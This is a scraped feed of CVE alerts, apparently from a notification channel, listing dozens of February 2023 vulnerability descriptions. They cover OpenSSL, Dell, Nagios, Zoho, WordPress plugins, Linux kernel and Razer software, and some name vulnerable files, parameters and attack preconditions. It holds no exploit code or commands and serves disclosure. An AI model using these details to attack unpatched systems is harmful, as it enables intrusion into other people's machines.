🚨 CVE-2023-0286There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.🎖@cveNotify |
|
| 2023-02-08 19:30:04 |
🚨 CVE-2022-48094lmxcms v1.41 was discovered to contain an arbitrary file read vulnerability via TemplateAction.class.php.🎖@cveNotify |
|
| 2023-02-08 19:30:03 |
🚨 CVE-2022-23455Potential security vulnerabilities have been identified in HP Support Assistant. These vulnerabilities include privilege escalation, compromise of integrity, allowed communication with untrusted clients, and unauthorized modification of files.🎖@cveNotify |
|
| 2023-02-08 19:30:02 |
🚨 CVE-2022-47854i-librarian 4.10 is vulnerable to Arbitrary file upload in ajaxsupplement.php.🎖@cveNotify |
|
| 2023-02-08 19:30:01 |
🚨 CVE-2023-23692Dell EMC prior to version DDOS 7.9 contain(s) an OS command injection Vulnerability. An authenticated non admin attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application.🎖@cveNotify |
|
| 2023-02-08 19:29:57 |
🚨 CVE-2022-23453Potential security vulnerabilities have been identified in HP Support Assistant. These vulnerabilities include privilege escalation, compromise of integrity, allowed communication with untrusted clients, and unauthorized modification of files.🎖@cveNotify |
|
| 2023-02-08 19:29:56 |
🚨 CVE-2022-45788A CWE-754: Improper Check for Unusual or Exceptional Conditions vulnerability exists that could cause arbitrary code execution, denial of service and loss of confidentiality & integrity when a malicious project file is loaded onto the controller. Affected Products: EcoStruxure™ Control Expert (All Versions), EcoStruxure™ Process Expert (Versions prior to V2020), Modicon M340 CPU - part numbers BMXP34* (All Versions), Modicon M580 CPU - part numbers BMEP* and BMEH* (All Versions), Modicon M580 CPU Safety - part numbers BMEP58*S and BMEH58*S (All Versions), Modicon Momentum Unity M1E Processor - 171CBU* (All Versions), Modicon MC80 - BMKC80 (All Versions), Legacy Modicon Quantum - 140CPU65* and Premium CPUs - TSXP57* (All Versions)🎖@cveNotify |
|
| 2023-02-08 19:29:55 |
🚨 CVE-2023-0001An information exposure vulnerability in the Palo Alto Networks Cortex XDR agent on Windows devices allows a local system administrator to disclose the admin password for the agent in cleartext, which bad actors can then use to execute privileged cytool commands that disable or uninstall the agent.🎖@cveNotify |
|
| 2023-02-08 19:29:54 |
🚨 CVE-2023-0003A file disclosure vulnerability in the Palo Alto Networks Cortex XSOAR server software enables an authenticated user with access to the web interface to read local files from the server.🎖@cveNotify |
|
| 2023-02-08 19:29:49 |
🚨 CVE-2022-47966Multiple Zoho ManageEngine on-premise products, such as ServiceDesk Plus through 14003, allow remote code execution due to use of Apache xmlsec (aka XML Security for Java) 1.4.1, because the xmlsec XSLT features, by design in that version, make the application responsible for certain security protections, and the ManageEngine applications did not provide those protections.🎖@cveNotify |
|
| 2023-02-08 19:29:48 |
🚨 CVE-2021-25298Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/cloud-vm/cloud-vm.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.🎖@cveNotify |
|
| 2023-02-08 19:29:47 |
🚨 CVE-2021-25297Nagios XI version xi-5.7.5 is affected by OS command injection. The vulnerability exists in the file /usr/local/nagiosxi/html/includes/configwizards/switch/switch.inc.php due to improper sanitization of authenticated user-controlled input by a single HTTP request, which can lead to OS command injection on the Nagios XI server.🎖@cveNotify |
|
| 2023-02-08 19:29:46 |
🚨 CVE-2023-23073Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via PO in the purchase component.🎖@cveNotify |
|
| 2023-02-08 19:29:42 |
🚨 CVE-2023-23074Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via embedding videos in the language component.🎖@cveNotify |
|
| 2023-02-08 19:29:41 |
🚨 CVE-2023-23620Discourse is an open-source discussion platform. Prior to version 3.0.1 on the `stable` branch and 3.1.0.beta2 on the `beta` and `tests-passed` branches, the contents of latest/top routes for restricted tags can be accessed by unauthorized users. This issue is patched in version 3.0.1 on the `stable` branch and 3.1.0.beta2 on the `beta` and `tests-passed` branches. There are no known workarounds.🎖@cveNotify |
|
| 2023-02-08 19:29:40 |
🚨 CVE-2022-34396Dell OpenManage Server Administrator (OMSA) version 10.3.0.0 and earlier contains a DLL Injection Vulnerability. A local low privileged authenticated attacker could potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. Exploitation may lead to a complete system compromise.🎖@cveNotify |
|
| 2023-02-08 19:29:39 |
🚨 CVE-2022-32522A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted mathematically reduced data request messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-02-08 19:29:38 |
🚨 CVE-2022-32524A CWE-120: Buffer Copy without Checking Size of Input vulnerability exists that could cause a stack-based buffer overflow, potentially leading to remote code execution when an attacker sends specially crafted time reduced data messages. Affected Products: IGSS Data Server - IGSSdataServer.exe (Versions prior to V15.0.0.22170)🎖@cveNotify |
|
| 2023-02-08 18:29:56 |
🚨 CVE-2022-34459Dell Command | Update, Dell Update, and Alienware Update versions prior to 4.7 contain a improper verification of cryptographic signature in get applicable driver component. A local malicious user could potentially exploit this vulnerability leading to malicious payload execution.🎖@cveNotify |
|
| 2023-02-08 18:29:55 |
🚨 CVE-2022-4062A CWE-285: Improper Authorization vulnerability exists that could cause unauthorized access to certain software functions when an attacker gets access to localhost interface of the EcoStruxure Power Commission application. Affected Products: EcoStruxure Power Commission (Versions prior to V2.25)🎖@cveNotify |
|
| 2023-02-08 18:29:54 |
🚨 CVE-2022-45095Dell PowerScale OneFS, 8.2.x-9.4.x, contain a command injection vulnerability. An authenticated user having access local shell and having the privilege to gather logs from the cluster could potentially exploit this vulnerability, leading to execute arbitrary commands, denial of service, information disclosure, and data deletion.🎖@cveNotify |
|
| 2023-02-08 18:29:50 |
🚨 CVE-2022-25916Versions of the package mt7688-wiscan before 0.8.3 are vulnerable to Command Injection due to improper input sanitization in the 'wiscan.scan' function.🎖@cveNotify |
|
| 2023-02-08 18:29:49 |
🚨 CVE-2023-0609Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.3.🎖@cveNotify |
|
| 2023-02-08 18:29:48 |
🚨 CVE-2023-0607Cross-site Scripting (XSS) - Stored in GitHub repository projectsend/projectsend prior to r1606.🎖@cveNotify |
|
| 2023-02-08 18:29:44 |
🚨 CVE-2022-45101Dell PowerScale OneFS 9.0.0.x - 9.4.0.x, contains an Improper Handling of Insufficient Privileges vulnerability in NFS. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to information disclosure and remote execution.🎖@cveNotify |
|
| 2023-02-08 18:29:43 |
🚨 CVE-2022-45096Dell PowerScale OneFS, 8.2.0 through 9.3.0, contain an User Interface Security Issue. An unauthenticated remote user could unintentionally lead an administrator to enable this vulnerability, leading to disclosure of information.🎖@cveNotify |
|
| 2023-02-08 18:29:42 |
🚨 CVE-2022-45097Dell PowerScale OneFS 9.0.0.x-9.4.0.x contains an Incorrect User Management vulnerability. A low privileged network attacker could potentially exploit this vulnerability, leading to escalation of privileges, and information disclosure.🎖@cveNotify |
|
| 2023-02-08 18:29:38 |
🚨 CVE-2022-47699COMFAST (Shenzhen Sihai Zhonglian Network Technology Co., Ltd) CF-WR623N Router firmware V2.3.0.1 is vulnerable to Incorrect Access Control.🎖@cveNotify |
|
| 2023-02-08 18:29:37 |
🚨 CVE-2022-46679Dell PowerScale OneFS 8.2.x, 9.0.0.x - 9.4.0.x, contain an insufficient resource pool vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to denial of service.🎖@cveNotify |
|
| 2023-02-08 18:29:36 |
🚨 CVE-2022-45098Dell PowerScale OneFS, 9.0.0.x-9.4.0.x, contain a cleartext storage of sensitive information vulnerability in S3 component. An authenticated local attacker could potentially exploit this vulnerability, leading to information disclosure.🎖@cveNotify |
|
| 2023-02-08 16:29:39 |
🚨 CVE-2023-0747Cross-site Scripting (XSS) - Stored in GitHub repository btcpayserver/btcpayserver prior to 1.7.6.🎖@cveNotify |
|
| 2023-02-08 16:29:37 |
🚨 CVE-2023-0732A vulnerability has been found in SourceCodester Online Eyewear Shop 1.0 and classified as problematic. Affected by this vulnerability is the function registration of the file oews/classes/Users.php of the component POST Request Handler. The manipulation of the argument firstname/middlename/lastname/email/contact leads to cross site scripting. The attack can be launched remotely. The identifier VDB-220369 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-02-08 16:29:36 |
🚨 CVE-2023-0610Improper Authorization in GitHub repository wallabag/wallabag prior to 2.5.3.🎖@cveNotify |
|
| 2023-02-08 12:29:48 |
🚨 CVE-2022-3437A heap-based buffer overflow vulnerability was found in Samba within the GSSAPI unwrap_des() and unwrap_des3() routines of Heimdal. The DES and Triple-DES decryption routines in the Heimdal GSSAPI library allow a length-limited write buffer overflow on malloc() allocated memory when presented with a maliciously small packet. This flaw allows a remote user to send specially crafted malicious data to the application, possibly resulting in a denial of service (DoS) attack.🎖@cveNotify |
|
| 2023-02-08 12:29:47 |
🚨 CVE-2023-0740Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.4.🎖@cveNotify |
|
| 2023-02-08 12:29:46 |
🚨 CVE-2023-0741Cross-site Scripting (XSS) - DOM in GitHub repository answerdev/answer prior to 1.0.4.🎖@cveNotify |
|
| 2023-02-08 12:29:45 |
🚨 CVE-2023-0742Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.4.🎖@cveNotify |
|
| 2023-02-08 12:29:44 |
🚨 CVE-2023-0743Cross-site Scripting (XSS) - Generic in GitHub repository answerdev/answer prior to 1.0.4.🎖@cveNotify |
|
| 2023-02-08 12:29:42 |
🚨 CVE-2023-0744Improper Access Control in GitHub repository answerdev/answer prior to 1.0.4.🎖@cveNotify |
|
| 2023-02-08 12:29:41 |
🚨 CVE-2021-3958Improper Handling of Parameters vulnerability in Ipack Automation Systems Ipack SCADA Software allows : Blind SQL Injection.This issue affects Ipack SCADA Software: from unspecified before 1.1.0.🎖@cveNotify |
|
| 2023-02-08 07:30:04 |
🚨 CVE-2023-0684The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_unassign_folders function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as changing the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:30:02 |
🚨 CVE-2023-0685The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_unassign_folders function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin..🎖@cveNotify |
|
| 2023-02-08 07:30:01 |
🚨 CVE-2023-0711The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_state function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the view state of the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:59 |
🚨 CVE-2023-0715The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_clone_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:58 |
🚨 CVE-2023-0716The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_edit_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:56 |
🚨 CVE-2023-0717The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_delete_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:55 |
🚨 CVE-2023-0720The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_folder_order function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:53 |
🚨 CVE-2023-0722The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_state function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:52 |
🚨 CVE-2023-0724The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_add_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:51 |
🚨 CVE-2023-0725The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_clone_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:49 |
🚨 CVE-2023-0726The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_edit_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 07:29:48 |
🚨 CVE-2022-46835IdentityIQ 8.3 and all 8.3 patch levels prior to 8.3p2, IdentityIQ 8.2 and all 8.2 patch levels prior to 8.2p5, IdentityIQ 8.1 and all 8.1 patch levels prior to 8.1p7, IdentityIQ 8.0 and all 8.0 patch levels prior to 8.0p6 allow access to arbitrary files in the application server filesystem due to a path traversal vulnerability in JavaServer Faces (JSF) 2.2.20 documented in CVE-2020-6950.🎖@cveNotify |
|
| 2023-02-08 07:29:46 |
🚨 CVE-2023-24829Incorrect Authorization vulnerability in Apache Software Foundation Apache IoTDB.This issue affects the iotdb-web-workbench component from 0.13.0 before 0.13.3. iotdb-web-workbench is an optional component of IoTDB, providing a web console of the database. This problem is fixed from version 0.13.3 of iotdb-web-workbench onwards.🎖@cveNotify |
|
| 2023-02-08 07:29:45 |
🚨 CVE-2022-48176Netgear routers R7000P before v1.3.3.154, R6900P before v1.3.3.154, R7960P before v1.4.4.94, and R8000P before v1.4.4.94 were discovered to contain a pre-authentication stack overflow.🎖@cveNotify |
|
| 2023-02-08 07:29:43 |
🚨 CVE-2022-47873Netcad KEOS 1.0 is vulnerable to XML External Entity (XXE) resulting in SSRF with XXE (remote).🎖@cveNotify |
|
| 2023-02-08 07:29:42 |
🚨 CVE-2022-45494Buffer overflow vulnerability in function json_parse_object in sheredom json.h before commit 0825301a07cbf51653882bf2b153cc81fdadf41 (November 14, 2022) allows attackers to code arbitrary code and gain escalated privileges.🎖@cveNotify |
|
| 2023-02-08 07:29:40 |
🚨 CVE-2022-45297EQ v1.5.31 to v2.2.0 was discovered to contain a SQL injection vulnerability via the UserPwd parameter.🎖@cveNotify |
|
| 2023-02-08 07:29:39 |
🚨 CVE-2023-0341A stack buffer overflow exists in the ec_glob function of editorconfig-core-c before v0.12.6 which allowed an attacker to arbitrarily write to the stack and possibly allows remote code execution. editorconfig-core-c v0.12.6 resolved this vulnerability by bound checking all write operations over the p_pcre buffer.🎖@cveNotify |
|
| 2023-02-08 07:29:38 |
🚨 CVE-2022-47769An arbitrary file write vulnerability in Serenissima Informatica Fast Checkin v1.0 allows unauthenticated attackers to upload malicious files in the web root of the application to gain access to the server via the web shell.🎖@cveNotify |
|
| 2023-02-08 07:29:36 |
🚨 CVE-2022-47768Serenissima Informatica Fast Checkin 1.0 is vulnerable to Directory Traversal.🎖@cveNotify |
|
| 2023-02-08 02:29:54 |
🚨 CVE-2022-45190An issue was discovered on Microchip RN4870 1.43 devices. An attacker within BLE radio range can bypass passkey entry in the legacy pairing of the device.🎖@cveNotify |
|
| 2023-02-08 02:29:53 |
🚨 CVE-2022-45191An issue was discovered on Microchip RN4870 1.43 devices. An attacker within BLE radio range can cause a denial of service by sending a pair confirm message with wrong values.🎖@cveNotify |
|
| 2023-02-08 02:29:50 |
🚨 CVE-2022-45192An issue was discovered on Microchip RN4870 1.43 devices. An attacker within BLE radio range can cause a denial of service by sending a cleartext encryption pause request.🎖@cveNotify |
|
| 2023-02-08 02:29:49 |
🚨 CVE-2023-0718The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_save_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 02:29:48 |
🚨 CVE-2021-36471Directory Traversal vulnerability in AdminLTE 3.1.0 allows remote attackers to gain escalated privilege and view sensitive information via /admin/index2.html, /admin/index3.html URIs.🎖@cveNotify |
|
| 2023-02-08 02:29:47 |
🚨 CVE-2022-47418LogicalDOC Enterprise and Community Edition (CE) are vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the document version comments.🎖@cveNotify |
|
| 2023-02-08 02:29:44 |
🚨 CVE-2023-0712The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_move_object function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 02:29:43 |
🚨 CVE-2023-0723The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_move_object function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 02:29:42 |
🚨 CVE-2023-0730The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_folder_order function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-08 02:29:38 |
🚨 CVE-2023-0735Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.5.4.🎖@cveNotify |
|
| 2023-02-08 02:29:37 |
🚨 CVE-2023-23011Cross Site Scripting (XSS) vulnerability in InvoicePlane 1.6 via filter_product input to file modal_product_lookups.php.🎖@cveNotify |
|
| 2023-02-08 02:29:36 |
🚨 CVE-2023-23026Cross site scripting (XSS) vulnerability in sourcecodester oretnom23 sales management system 1.0, allows attackers to execute arbitrary code via the product_name and product_price inputs in file print.php.🎖@cveNotify |
|
| 2023-02-07 23:30:16 |
🚨 CVE-2017-18079drivers/input/serio/i8042.c in the Linux kernel before 4.12.4 allows attackers to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact because the port->exists value can change after it is validated.🎖@cveNotify |
|
| 2023-02-07 23:30:15 |
🚨 CVE-2017-17855kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars.🎖@cveNotify |
|
| 2023-02-07 23:30:13 |
🚨 CVE-2017-17857The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations.🎖@cveNotify |
|
| 2023-02-07 23:30:11 |
🚨 CVE-2017-17856kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement.🎖@cveNotify |
|
| 2023-02-07 23:30:09 |
🚨 CVE-2022-46663In GNU Less before 609, crafted data can result in "less -R" not filtering ANSI escape sequences sent to the terminal.🎖@cveNotify |
|
| 2023-02-07 23:30:07 |
🚨 CVE-2022-47413Given a malicious document provided by an attacker, the OpenKM DMS is vulnerable to a stored (persistent, or "Type II") XSS condition.🎖@cveNotify |
|
| 2023-02-07 23:30:06 |
🚨 CVE-2022-47414If an attacker has access to the console for OpenKM (and is authenticated), a stored XSS vulnerability is reachable in the document "note" functionality.🎖@cveNotify |
|
| 2023-02-07 23:30:04 |
🚨 CVE-2022-47415LogicalDOC Enterprise and Community Edition (CE) are vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the in-app messaging system (both subject and message bodies).🎖@cveNotify |
|
| 2023-02-07 23:30:01 |
🚨 CVE-2022-47416LogicalDOC Enterprise is vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the in-app chat system.🎖@cveNotify |
|
| 2023-02-07 23:30:00 |
🚨 CVE-2022-47417LogicalDOC Enterprise and Community Edition (CE) are vulnerable to a stored (persistent, or "Type II") cross-site scripting (XSS) condition in the document file name.🎖@cveNotify |
|
| 2023-02-07 23:29:57 |
🚨 CVE-2022-47419An XSS vulnerability was discovered in the Mayan EDMS DMS. Successful XSS exploitation was observed in the in-product tagging system.🎖@cveNotify |
|
| 2023-02-07 23:29:55 |
🚨 CVE-2023-0728The Wicked Folders plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.18.16. This is due to missing or incorrect nonce validation on the ajax_save_folder function. This makes it possible for unauthenticated attackers to invoke this function via forged request granted they can trick a site administrator into performing an action such as clicking on a link leading them to perform actions intended for administrators such as changing the folder structure maintained by the plugin.🎖@cveNotify |
|
| 2023-02-07 23:29:54 |
🚨 CVE-2023-24241Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /admin/loginpost.php.🎖@cveNotify |
|
| 2023-02-07 23:29:53 |
🚨 CVE-2023-24956Forget Heart Message Box v1.1 was discovered to contain a SQL injection vulnerability via the name parameter at /cha.php.🎖@cveNotify |
|
| 2023-02-07 23:29:51 |
🚨 CVE-2017-18218In drivers/net/ethernet/hisilicon/hns/hns_enet.c in the Linux kernel before 4.13, local users can cause a denial of service (use-after-free and BUG) or possibly have unspecified other impact by leveraging differences in skb handling between hns_nic_net_xmit_hw and hns_nic_net_xmit.🎖@cveNotify |
|
| 2023-02-07 23:29:48 |
🚨 CVE-2017-18509An issue was discovered in net/ipv6/ip6mr.c in the Linux kernel before 4.11. By setting a specific socket option, an attacker can control a pointer in kernel land and cause an inet_csk_listen_stop general protection fault, or potentially execute arbitrary code under certain circumstances. The issue can be triggered as root (e.g., inside a default LXC container or with the CAP_NET_ADMIN capability) or after namespace unsharing. This occurs because sk_type and protocol are not checked in the appropriate part of the ip6_mroute_* functions. NOTE: this affects Linux distributions that use 4.9.x longterm kernels before 4.9.187.🎖@cveNotify |
|
| 2023-02-07 23:29:47 |
🚨 CVE-2022-44718An issue was discovered in NetScout nGeniusONE 6.3.2 build 904. Open Redirection can occur (issue 2 of 2). After successful login, an attacker must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host. The attack vector is Network, and the Attack Complexity required is High. Privileges required are administrator, User Interaction is required, and Scope is unchanged. The user must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host.🎖@cveNotify |
|
| 2023-02-07 23:29:45 |
🚨 CVE-2023-0606Cross-site Scripting (XSS) - Reflected in GitHub repository ampache/ampache prior to 5.5.7.🎖@cveNotify |
|
| 2023-02-07 23:29:43 |
🚨 CVE-2022-47632Razer Synapse before 3.7.0830.081906 allows privilege escalation due to an unsafe installation path, improper privilege management, and improper certificate validation. Attackers can place malicious DLLs into %PROGRAMDATA%\Razer\Synapse3\Service\bin if they do so before the service is installed and if they deny write access for the SYSTEM user. Although the service will not start if the malicious DLLs are unsigned, it suffices to use self-signed DLLs. The validity of the DLL signatures is not checked. As a result, local Windows users can abuse the Razer driver installer to obtain administrative privileges on Windows.🎖@cveNotify |
|
| 2023-02-07 22:30:03 |
🚨 CVE-2022-32521A CWE 502: Deserialization of Untrusted Data vulnerability exists that could allow code to be remotely executed on the server when unsafely deserialized data is posted to the web server. Affected Products: Data Center Expert (Versions prior to V7.9.0)🎖@cveNotify |
|
| 2023-02-07 22:30:02 |
🚨 CVE-2022-23552Grafana is an open-source platform for monitoring and observability. Starting with the 8.1 branch and prior to versions 8.5.16, 9.2.10, and 9.3.4, Grafana had a stored XSS vulnerability affecting the core plugin GeoMap. The stored XSS vulnerability was possible because SVG files weren't properly sanitized and allowed arbitrary JavaScript to be executed in the context of the currently authorized user of the Grafana instance. An attacker needs to have the Editor role in order to change a panel to include either an external URL to a SVG-file containing JavaScript, or use the `data:` scheme to load an inline SVG-file containing JavaScript. This means that vertical privilege escalation is possible, where a user with Editor role can change to a known password for a user having Admin role if the user with Admin role executes malicious JavaScript viewing a dashboard. Users may upgrade to version 8.5.16, 9.2.10, or 9.3.4 to receive a fix.🎖@cveNotify |
|
| 2023-02-07 22:30:01 |
🚨 CVE-2022-39380Wire web-app is part of Wire communications. Versions prior to 2022-11-02 are subject to Improper Handling of Exceptional Conditions. In the wire-webapp, certain combinations of Markdown formatting can trigger an unhandled error in the conversion to HTML representation. The error makes it impossible to display the affected chat history, other conversations are not affected. The issue has been fixed in version 2022-11-02 and is already deployed on all Wire managed services. On-premise instances of wire-webapp need to be updated to docker tag 2022-11-02-production.0-v0.31.9-0-337e400 or wire-server 2022-11-03 (chart/4.26.0), so that their applications are no longer affected. As a workaround, you may use an iOS or Android client and delete the corresponding message from the history OR write 30 or more messages into the affected conversation to prevent the client from further rendering of the corresponding message. When attempting to retrieve messages from the conversation history, the error will continue to occur once the malformed message is part of the result.🎖@cveNotify |
|
| 2023-02-07 22:29:57 |
🚨 CVE-2021-21395Magneto LTS (Long Term Support) is a community developed alternative to the Magento CE official releases. Versions prior to 19.4.22 and 20.0.19 are vulnerable to Cross-Site Request Forgery. The password reset form is vulnerable to CSRF between the time the reset password link is clicked and user submits new password. This issue is patched in versions 19.4.22 and 20.0.19. There are no workarounds.🎖@cveNotify |
|
| 2023-02-07 22:29:56 |
🚨 CVE-2022-4139An incorrect TLB flush issue was found in the Linux kernel’s GPU i915 kernel driver, potentially leading to random memory corruption or data leaks. This flaw could allow a local user to crash the system or escalate their privileges on the system.🎖@cveNotify |
|
| 2023-02-07 22:29:52 |
🚨 CVE-2022-32519A CWE-257: Storing Passwords in a Recoverable Format vulnerability exists that could result in unwanted access to a DCE instance when performed over a network by a malicious third-party. Affected Products: Data Center Expert (Versions prior to V7.9.0)🎖@cveNotify |
|
| 2023-02-07 22:29:51 |
🚨 CVE-2022-32520A CWE-522: Insufficiently Protected Credentials vulnerability exists that could result in unwanted access to a DCE instance when performed over a network by a malicious third-party. This CVE is unique from CVE-2022-32518. Affected Products: Data Center Expert (Versions prior to V7.9.0)🎖@cveNotify |
|
| 2023-02-07 22:29:50 |
🚨 CVE-2023-0572Unchecked Error Condition in GitHub repository froxlor/froxlor prior to 2.0.10.🎖@cveNotify |
|
| 2023-02-07 22:29:47 |
🚨 CVE-2022-32517A CWE-1021: Improper Restriction of Rendered UI Layers or Frames vulnerability exists that could cause an adversary to trick the interface user/admin into interacting with the application in an unintended way when the product does not implement restrictions on the ability to render within frames on external addresses. Affected Products: Conext™ ComBox (All Versions)🎖@cveNotify |
|
| 2023-02-07 22:29:46 |
🚨 CVE-2023-23629Metabase is an open source data analytics platform. Affected versions are subject to Improper Privilege Management. As intended, recipients of dashboards subscriptions can view the data as seen by the creator of that subscription. This allows someone with greater access to data to create a dashboard subscription, add people with fewer data privileges, and all recipients of that subscription receive the same data: the charts shown in the email would abide by the privileges of the user who created the subscription. The issue is users with fewer privileges who can view a dashboard are able to add themselves to a dashboard subscription created by someone with additional data privileges, and thus get access to more data via email. This issue is patched in versions 0.43.7.1, 1.43.7.1, 0.44.6.1, 1.44.6.1, 0.45.2.1, and 1.45.2.1. On Metabase instances running Enterprise Edition, admins can disable the "Subscriptions and Alerts" permission for groups that have restricted data permissions, as a workaround.🎖@cveNotify |
|
| 2023-02-07 22:29:45 |
